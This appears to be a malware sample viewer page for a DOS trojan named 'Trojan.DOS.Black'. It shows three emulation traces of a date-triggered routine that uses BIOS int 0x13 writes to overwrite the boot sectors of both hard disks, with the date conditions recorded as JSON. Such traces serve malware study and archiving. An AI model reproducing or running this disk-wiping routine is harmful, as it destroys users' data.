Sample viewer

vx.netlux.org/Trojan.DOS.Black

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:58:26.87849049Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":934,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:06.700804958Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti

{"DateBased":true,"Day":12,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":934,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:06.710330194Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti